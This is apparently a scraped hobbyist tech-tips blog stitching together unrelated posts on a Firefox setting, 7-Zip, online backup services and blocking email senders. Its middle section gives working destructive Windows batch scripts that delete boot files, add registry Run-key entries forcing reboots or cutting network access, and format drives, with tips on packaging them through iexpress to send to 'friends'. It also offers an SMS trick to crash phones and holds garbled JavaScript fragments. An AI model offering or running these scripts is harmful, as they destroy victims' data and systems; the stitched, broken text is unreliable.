Hello world!
Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!
Faster Videos in Firefox
1.Type about:config in the adress bar
2.Use the filter box to find the setting browser.sessionstore.interval
3.Edit the default value 10000 (10 seconds in million seconds)
to 180000 which is 3 min
How does the tweak work?
Firefox takes snapshots of ur browser every 10 sec to restore iffirefox crashes but slows flash too so this is a slight compromise forfast videos.
Enjoy Mates!!!
7-Zip file archiver with high compression ratio.
7-Zip is a rock-solid file archiver for Windows with a high compressionratio. It is the premier archiver for the LZMA compression format(a.k.a. 7z). Indeed, the 7-zip web site is also the home of the LZMASDK (Software Development Kit).
Compared to WinRAR 3.50, CAB ARC5.1, win zip 10.0 beta (maximum-PP Md), win zip 10.0 beta(maximum-portable) this software have high compression rate and itsaves more space, system requirements are also mininmal
Version 4.42 of 7-zip has been a workhorse for over a year. The just-released 4.47 (beta) offers these improvements:
* New fast compression mode for Deflate method in Zip and GZip.
* New “Compress shared files” option in GUI and -ssw switch.
* Some bugs were fixed.
* New localization: Norwegian Nynorsk.
The main features of 7-Zip are:
* High compression ratio in new 7z format with LZMA compression
* Supported formats:
o Packing / unpacking: 7z, ZIP, GZIP, BZIP2 and TAR
o Unpacking only: RAR, CAB, ISO, ARJ, LZH, CHM, Z, CPIO, RPM, DEB and NSIS
* For ZIP and GZIP formats, 7-Zip provides a compression ratio that is2-10 % better than the ratio provided by PKZip and WinZip
* Self-extracting capability for 7z format
* Integration with Windows Shell
* Powerful File Manager
* Powerful command line version
* Plugin for FAR Manager
* Localizations for 63 languages
Download from 7-Zip
Upload what ever you want
Low hard disk space but high speed internet with unlimited transfer, then its not a problem
The table below shows the top 25 online backup companies in the world. Our ranking is based on a number of factors.
Here are some of the major criteria that we strictly followed to come up with these top 25 companies:
* Security
* Software Features
* Software Ease of Use
* Speed
* Reliability
* Uptime
* Quality and Accessibility of Technical Support
* Cost per MB per month
The Top 25 Online Backup Companies for August 2007 are:
1. http://www.mediamax.com
2. http://www.mozy.com
3. http://www.box.net
4. http://www.carbonite.com
5. www.ibackup.com
6. http://www.novastor.com
7. http://www.datadepositbox.com
8. http://www.evault.com
9. http://www.intronis.com
10. http://www.file123.com
11. http://www.filesanywhere.com
12. http://www.remote-backup.com
13. http://www.backup-technology.co.uk
14. http://www.omnidrive.com
15. http://www.amerivault.com
16. http://www.livevault.com
17. http://www.BeInSync.com
18. http://www.backupsolutions.com
19. http://www.quantumrbs.ca
20. http://www.drivehq.com
21. http://www.dataprotection.com
22. http://www.titanize.com
23. http://www.vaultlogix.com
24. http://www.sosonlinebackup.com
25. http://www.bitleap.com
HOW TO BLOCK UNWANTED MAILS IN GMAIL YAHOO HOTMAIL..
Do you want to block those annoying offers and newsletters that reachyour inbox? Well here is a way to block all those unwanted and annoyingemails that you do not want to see or read! With this trick you canblock individual email address or the whole domain from which you donot want the emails to come from. Here are the step-by-stepinstructions to do this.
For Gmail
1. Login to your account
2. At the top-right corner, click on Settings
3. Under Settings, click on Filters
4. You’ll now see an option “Create a new filter“, click on it
5. Now in the From field enter the email address from which you do not want to receive the emails
For ex. you may enter micheal@gmail .com in the From field to block allincoming emails from this address. However if you want to block thewhole domain then use the following syntax: *****@abc.com. Now all theincoming emails from the domain xyz.com will be blocked.
6. Click on Next Step, select the action you’d like to take on theblocked emails. You may select the option Delete it so that the blockedemail is moved to trash. To unblock the email, all you need to do isjust delete the filter that you’ve created.
For Yahoo
1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. In the left panel select the option Filters and click on create or edit filters
5. Now click on Add
6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.
Fox ex. micheal@gmail.com or if you want to block an entire domain thenjust enter @abc.com. Dont enter *@abc.com. Select the option Move themessage to: Trash and click on Save Changes.
For Hotmail
1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. Click on Safe and blocked senders link under Junk e-mail
5. Now click on Blocked senders
6. Type in the email address that you want to block under blocked e-mail address or domain field.
For ex. Enter john@yahoo.com to block the individual email address or just enter abc.com to block the entire domain.
That’s it. You no longer receive those annoying emails in your inbox.Keep your inbox clean and tidy . I hope this post helps. pass yourcomments!
Shut Down A Computer Forever
Open up notepad and copy and paste the above code . Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun …
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Be very careful how you handle these.
[Just copy these to the notepad and save as whatever.bat]
**Shutdown computer when its booted**
Quote:
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo everready Strikes Again
PAUSE
________________________________________
**Disable Internet/network permently**
Quote:
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo everready Strikes Again
___________________________________
Quote:
Format their harddrive
@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y[
———————-
There is a way to send these as installation files–
Start>Run>iexpress.exe
and fallow the instruction.
__________________________________________
This TuT is for educational purpose only
Iam not responsible for any of your actions!!!!
Enjoy xD!
REMEMBER – DO NOT CLICK THIS FILE.
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
Restart your friends mobile
If u want to restart your friends mobile thru SMS then just follow steps.
But before steps know the conditions:-
This hacking only supports in Nokia 1110,1110i,2100,1100,1112
(it means tht ur fend shud have mobile of any above mentioned model)
Now the procedure
Step1- Goto write message
Step2- Type 79 inverted commas like this — ,,,,,,,,,,,,,, ,,,,,,,,,,, ,,,,,,,,,,,
Step3- Now send it to your frends number.
POSTING OF COMMENT IS NECESSARY FOR YOU
How to send fake mail to your friends
No download
needed!!!!Online
(No ads in sent email)
Chat without Yahoo Messenger or Gtalk
summary_noimg = 300;summary_img = 200;img_thumb_height = 110;img_thumb_width = 150; //<![CDATA[function removeHtmlTag(strx,chop){ if(strx.indexOf("<")!=-1) { var s = strx.split("<"); for(var i=0;i“)!=-1){ s[i] = s[i].substring(s[i].indexOf(“>”)+1,s[i].length); } } strx = s.join(“”); } chop = (chop =1) { imgtag = ‘‘; summ = summary_img; } var summary = imgtag + ‘
‘; div.innerHTML = summary;}//]]>


- Easy to use, Simple installation that will have you up and running in minutes.
- 128-Bit Security Socket Layer(SSL) support. support for server level certificate creation.
- Instantly runs a complete chat server on your PCs – does not need to install any Web Server.
- Supports full private messaging and One to One private chat.
- Support of images, smileys, avatar icons.
- Full chat and access logs are available within the chat server.
- Have a built-in IP Filter, supports banning/unbanning IP address, securely.
- Multiple styles available for the user to customize rooms.
- Unlimited rooms and users, no any annual, per-user, or maintenance fees.
- No spyware, adware or other unwanted extra programs.
Secret google pages logo collection
Google work with Microsoft or MAC ? A game in Google Search Engine? A Google in Pirates Language? Well, many of us use the Google Search Engine for various purposes, but we are not aware of the fact that google has some hidden pages which serve the purpose of user accordingly. Suppose you are a great Hacker and you want things differently, then Google has a page for you. Amazed !!, here you go are some of the special pages by google.
Special searches

